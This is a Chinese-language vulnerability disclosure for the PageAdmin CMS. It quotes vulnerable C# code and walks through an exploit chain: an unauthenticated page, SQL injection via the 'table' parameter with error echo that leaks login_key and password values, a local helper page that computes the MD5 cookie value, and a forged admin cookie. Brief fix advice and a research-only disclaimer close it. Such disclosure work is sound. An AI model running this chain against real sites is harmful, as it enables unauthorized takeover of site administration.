简要描述:
详细说明:
#1 一个越权 /e/master/build_static.aspx
code 区域
protected void Page_Load(Object src,EventArgs e) { Ids=Request.QueryString["ids"]; Table=Request.QueryString["table"]; Conn Myconn=new Conn(); conn=Myconn.OleDbConn();//获取OleDbConnection switch(Table) { case "pa_zt": Build_Lanmu(); break; case "pa_zt_sublanmu": Build_SubLanmu(); break; case "pa_lanmu": Build_Lanmu(); break; case "pa_sublanmu": Build_SubLanmu(); break; default: Build_Detail(); break; } }
#2 注入点
code 区域
private void Build_Detail() { conn.Open(); if(Ids!=null && IsNum(Ids.Replace(",",""))) { Build_Html BH=new Build_Html(); if(IsNum(Ids)) { sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id="+Ids; } else { sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id in("+Ids+")"; } OleDbCommand comm=new OleDbCommand(sql,conn); OleDbDataReader dr=comm.ExecuteReader(); while(dr.Read()) { try { BH.Build_Detail(dr["site_dir"].ToString(),dr["static_dir"].ToString(),dr["static_file"].ToString(),dr["lanmu_id"].ToString(),dr["sublanmu_id"].ToString(),dr["id"].ToString()); } catch(Exception e) { LocalUrl="http://"+Request.ServerVariables["SERVER_NAME"]+":"+Request.ServerVariables["SERVER_PORT"]; SiteDir=dr["site_dir"].ToString(); SiteDir=(SiteDir==""?"/":("/"+SiteDir+"/")); ErrorUrl=LocalUrl+SiteDir+"index.aspx?lanmuid="+dr["lanmu_id"].ToString()+"&sublanmuid="+dr["sublanmu_id"].ToString()+"&id="+dr["id"].ToString(); Response.Write(ErrorUrl+"生成失败:"+e.Message); Response.End(); break; } } dr.Close(); conn.Close(); Response.Write("success"); Response.End(); } Response.Write("Invalid Ids"); Response.End(); }
其中Table参数可构造:
code 区域
sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id="+Ids;
且会产生错误回显:
code 区域
ErrorUrl=LocalUrl+SiteDir+"index.aspx?lanmuid="+dr["lanmu_id"].ToString()+"&sublanmuid="+dr["sublanmu_id"].ToString()+"&id="+dr["id"].ToString(); Response.Write(ErrorUrl+"生成失败:"+e.Message);
#3 构造请求可得到login_key(见POC),鉴权cookie中的valicate由以下代码生成,且LoginKey被存入数据库login_key字段:
code 区域
string LoginKey=Guid.NewGuid().ToString("N")+LoginDate.AddSeconds(r.Next(1,2592000)).ToString("yyMMddHHmmss"); Md5 Jm=new Md5(); HttpCookie MCookie=new HttpCookie("Member"); MCookie.Values.Add("UID",UID); MCookie.Values.Add("Valicate",Jm.Get_Md5(LoginKey)); Response.AppendCookie(MCookie); Update_Member(UID,LoginDate,LoginKey);
#4 利用本地pageadmin环境进行login_key的加密:
code 区域
新建test.aspx<% @ Import NameSpace="System.Data.OleDb"%> <% @ Import NameSpace="PageAdmin"%> <script Language="C#" Runat="server"> protected void Page_Load(Object sender,EventArgs e) { string loginkey=Request.QueryString["loginkey"]; Response.Write(new Md5().Get_Md5(loginkey)); } </script>
#5伪造cookie即可进入后台
code 区域
**.**.**.** FALSE / FALSE Master UID=2&Valicate=abd2128c766f990f7b4ec19c137e452117db **.**.**.** FALSE / ALSE SiteId 1
漏洞证明:
#1使用poc获取报错
code 区域
http://**.**.**.**:80/2/index.aspx?lanmuid=bae915239122142b5101e319cf516ef3e371121&sublanmuid=f3fac35c66184f9281b221fa41ddbf59_160123191804&id=2生成失败:The remote server returned an error: (404) Not Found.
其中sublanmuid的值为login_key,lanmuid的值为密码
#2得到加密后的valicate
abd2128c766f990f7b4ec19c137e452117db
#3伪造cookie进入后台
修复方案:
#1 页面鉴权
#2 sql_format
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论